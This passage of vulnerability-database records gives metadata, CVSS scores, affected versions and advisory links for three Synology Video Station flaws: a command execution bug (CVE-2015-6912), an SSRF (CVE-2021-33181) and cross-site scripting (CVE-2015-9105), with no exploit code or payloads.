"id": "CNNVD-201509-152"
},
{
"db": "NVD",
"id": "CVE-2015-6912"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-09-11T00:00:00",
"db": "VULHUB",
"id": "VHN-84873"
},
{
"date": "2015-09-11T00:00:00",
"db": "VULMON",
"id": "CVE-2015-6912"
},
{
"date": "2015-09-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-004689"
},
{
"date": "2015-09-10T00:05:25",
"db": "PACKETSTORM",
"id": "133519"
},
{
"date": "2015-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-152"
},
{
"date": "2015-09-11T16:59:18.707000",
"db": "NVD",
"id": "CVE-2015-6912"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-84873"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULMON",
"id": "CVE-2015-6912"
},
{
"date": "2015-09-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-004689"
},
{
"date": "2015-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-152"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2015-6912"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "133519"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-152"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Synology Video Station In any shell Command execution vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004689"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201509-152"
}
],
"trust": 0.6
}
}
VAR-202106-1167
Vulnerability from variot - Updated: 2024-08-14 14:31Server-Side Request Forgery (SSRF) vulnerability in webapi component in Synology Video Station before 2.4.10-1632 allows remote authenticated users to send arbitrary request to intranet resources via unspecified vectors. Synology Video Station is a video management center. All movies, TV shows and home videos on your Synology NAS can be managed
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202106-1167",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "video station",
"scope": "lt",
"trust": 1.0,
"vendor": "synology",
"version": "2.4.10-1632"
},
{
"model": "video station",
"scope": "eq",
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": "video station",
"scope": "eq",
"trust": 0.8,
"vendor": "synology",
"version": "2.4.10-1632"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007583"
},
{
"db": "NVD",
"id": "CVE-2021-33181"
}
]
},
"cve": "CVE-2021-33181",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-33181",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-393195",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.3,
"id": "CVE-2021-33181",
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security@synology.com",
"availabilityImpact": "LOW",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"id": "CVE-2021-33181",
"impactScore": 3.7,
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.1,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-33181",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33181",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "security@synology.com",
"id": "CVE-2021-33181",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2021-33181",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-202106-072",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-393195",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-393195"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007583"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-072"
},
{
"db": "NVD",
"id": "CVE-2021-33181"
},
{
"db": "NVD",
"id": "CVE-2021-33181"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Server-Side Request Forgery (SSRF) vulnerability in webapi component in Synology Video Station before 2.4.10-1632 allows remote authenticated users to send arbitrary request to intranet resources via unspecified vectors. Synology Video Station is a video management center. All movies, TV shows and home videos on your Synology NAS can be managed",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33181"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007583"
},
{
"db": "VULHUB",
"id": "VHN-393195"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33181",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007583",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202106-072",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-393195",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-393195"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007583"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-072"
},
{
"db": "NVD",
"id": "CVE-2021-33181"
}
]
},
"id": "VAR-202106-1167",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-393195"
}
],
"trust": 0.01
},
"last_update_date": "2024-08-14T14:31:42.714000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Synology-SA-21",
"trust": 0.8,
"url": "https://www.synology.com/security/advisory/Synology_SA_21_04"
},
{
"title": "Synology Video Station Video Station Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=153877"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007583"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-072"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-918",
"trust": 1.1
},
{
"problemtype": "Server-side request forgery (CWE-918) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-393195"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007583"
},
{
"db": "NVD",
"id": "CVE-2021-33181"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://www.synology.com/security/advisory/synology_sa_21_04"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33181"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-393195"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007583"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-072"
},
{
"db": "NVD",
"id": "CVE-2021-33181"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-393195"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007583"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-072"
},
{
"db": "NVD",
"id": "CVE-2021-33181"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-06-01T00:00:00",
"db": "VULHUB",
"id": "VHN-393195"
},
{
"date": "2022-02-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-007583"
},
{
"date": "2021-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-072"
},
{
"date": "2021-06-01T14:15:10.110000",
"db": "NVD",
"id": "CVE-2021-33181"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-06-10T00:00:00",
"db": "VULHUB",
"id": "VHN-393195"
},
{
"date": "2022-02-17T06:42:00",
"db": "JVNDB",
"id": "JVNDB-2021-007583"
},
{
"date": "2021-06-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-072"
},
{
"date": "2021-06-10T15:57:30.777000",
"db": "NVD",
"id": "CVE-2021-33181"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202106-072"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Synology\u00a0Video\u00a0Station\u00a0 Server-side Request Forgery Vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007583"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202106-072"
}
],
"trust": 0.6
}
}
CVE-2015-9105 (GCVE-0-2015-9105)
Vulnerability from nvd – Published: 2017-06-30 13:00 – Updated: 2024-09-16 18:55
VLAI?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in Synology Video Station 1.2 before 1.2-0455, 1.5 before 1.5-0772, and 1.6 before 1.6-0847 allow remote authenticated attackers to inject arbitrary web script or HTML via the (1) file name or (2) collection name of videos.
Severity ?
No CVSS data available.
CWE
- CWE-79 - Cross Site Scripting (CWE-79)
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Synology | Video Station |
Affected:
1.2
Affected: 1.5 Affected: 1.6 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T08:36:31.894Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.fortiguard.com/zeroday/FG-VD-15-107"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.synology.com/en-global/support/security/Video_station_1_5_0772"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.fortiguard.com/zeroday/FG-VD-15-108"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Video Station",
"vendor": "Synology",
"versions": [
{
"status": "affected",
"version": "1.2"
},
{
"status": "affected",
"version": "1.5"
},
{
"status": "affected",
"version": "1.6"
}
]
}
],
"datePublic": "2015-12-10T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Synology Video Station 1.2 before 1.2-0455, 1.5 before 1.5-0772, and 1.6 before 1.6-0847 allow remote authenticated attackers to inject arbitrary web script or HTML via the (1) file name or (2) collection name of videos."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "Cross Site Scripting (CWE-79)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-06-30T12:57:01",
"orgId": "db201096-a0cc-46c7-9a55-61d9e221bf01",
"shortName": "synology"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.fortiguard.com/zeroday/FG-VD-15-107"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.synology.com/en-global/support/security/Video_station_1_5_0772"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.fortiguard.com/zeroday/FG-VD-15-108"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@synology.com",
"DATE_PUBLIC": "2015-12-10T00:00:00",
"ID": "CVE-2015-9105",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Video Station",
"version": {
"version_data": [
{
"version_value": "1.2"
},
{
"version_value": "1.5"
},
{
"version_value": "1.6"
}
]
}
}
]
},
"vendor_name": "Synology"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Synology Video Station 1.2 before 1.2-0455, 1.5 before 1.5-0772, and 1.6 before 1.6-0847 allow remote authenticated attackers to inject arbitrary web script or HTML via the (1) file name or (2) collection name of videos."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Cross Site Scripting (CWE-79)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.fortiguard.com/zeroday/FG-VD-15-107",
"refsource": "MISC",
"url": "http://www.fortiguard.com/zeroday/FG-VD-15-107"
},
{
"name": "https://www.synology.com/en-global/support/security/Video_station_1_5_0772",
"refsource": "CONFIRM",
"url": "https://www.synology.com/en-global/support/security/Video_station_1_5_0772"
},
{
"name": "http://www.fortiguard.com/zeroday/FG-VD-15-108",
"refsource": "MISC",
"url": "http://www.fortiguard.com/zeroday/FG-VD-15-108"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "db201096-a0cc-46c7-9a55-61d9e221bf01",
"assignerShortName": "synology",
"cveId": "CVE-2015-9105",
"datePublished": "2017-06-30T13:00:00Z",
"dateReserved": "2017-06-29T00:00:00",
"dateUpdated": "2024-09-16T18:55:51.751Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2015-9105 (GCVE-0-2015-9105)
Vulnerability from cvelistv5 – Published: 2017-06-30 13:00 – Updated: 2024-09-16 18:55
VLAI?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in Synology Video Station 1.2 before 1.2-0455, 1.5 before 1.5-0772, and 1.6 before 1.6-0847 allow remote authenticated attackers to inject arbitrary web script or HTML via the (1) file name or (2) collection name of videos.
Severity ?
No CVSS data available.
CWE
- CWE-79 - Cross Site Scripting (CWE-79)
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Synology | Video Station |
Affected:
1.2
Affected: 1.5 Affected: 1.6 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T08:36:31.894Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.fortiguard.com/zeroday/FG-VD-15-107"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.synology.com/en-global/support/security/Video_station_1_5_0772"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.fortiguard.com/zeroday/FG-VD-15-108"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Video Station",
"vendor": "Synology",
"versions": [
{
"status": "affected",
"version": "1.2"
},
{
"status": "affected",
"version": "1.5"
},
{
"status": "affected",
"version": "1.6"
}
]
}
],
"datePublic": "2015-12-10T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Synology Video Station 1.2 before 1.2-0455, 1.5 before 1.5-0772, and 1.6 before 1.6-0847 allow remote authenticated attackers to inject arbitrary web script or HTML via the (1) file name or (2) collection name of videos."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "Cross Site Scripting (CWE-79)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-06-30T12:57:01",
"orgId": "db201096-a0cc-46c7-9a55-61d9e221bf01",
"shortName": "synology"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.fortiguard.com/zeroday/FG-VD-15-107"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.synology.com/en-global/support/security/Video_station_1_5_0772"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.fortiguard.com/zeroday/FG-VD-15-108"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@synology.com",
"DATE_PUBLIC": "2015-12-10T00:00:00",
"ID": "CVE-2015-9105",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Video Station",
"version": {
"version_data": [
{
"version_value": "1.2"
},
{
"version_value": "1.5"
},
{
"version_value": "1.6"
}
]
}
}
]
},
"vendor_name": "Synology"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Synology Video Station 1.2 before 1.2-0455, 1.5 before 1.5-0772, and 1.6 before 1.6-0847 allow remote authenticated attackers to inject arbitrary web script or HTML via the (1) file name or (2) collection name of videos."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Cross Site Scripting (CWE-79)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.fortiguard.com/zeroday/FG-VD-15-107",
"refsource": "MISC",
"url": "http://www.fortiguard.com/zeroday/FG-VD-15-107"
},
{
"name": "https://www.synology.com/en-global/support/security/Video_station_1_5_0772",
"refsource": "CONFIRM",
"url": "https://www.synology.com/en-global/support/security/Video_station_1_5_0772"
},
{
"name": "http://www.fortiguard.com/zeroday/FG-VD-15-108",
"refsource": "MISC",
"url": "http://www.fortiguard.com/zeroday/FG-VD-15-108"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "db201096-a0cc-46c7-9a55-61d9e221bf01",
"assignerShortName": "synology",
"cveId": "CVE-2015-9105",
"datePublished": "2017-06-30T13:00:00Z",
"dateReserved": "2017-06-29T00:00:00",
"dateUpdated": "2024-09-16T18:55:51.751Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}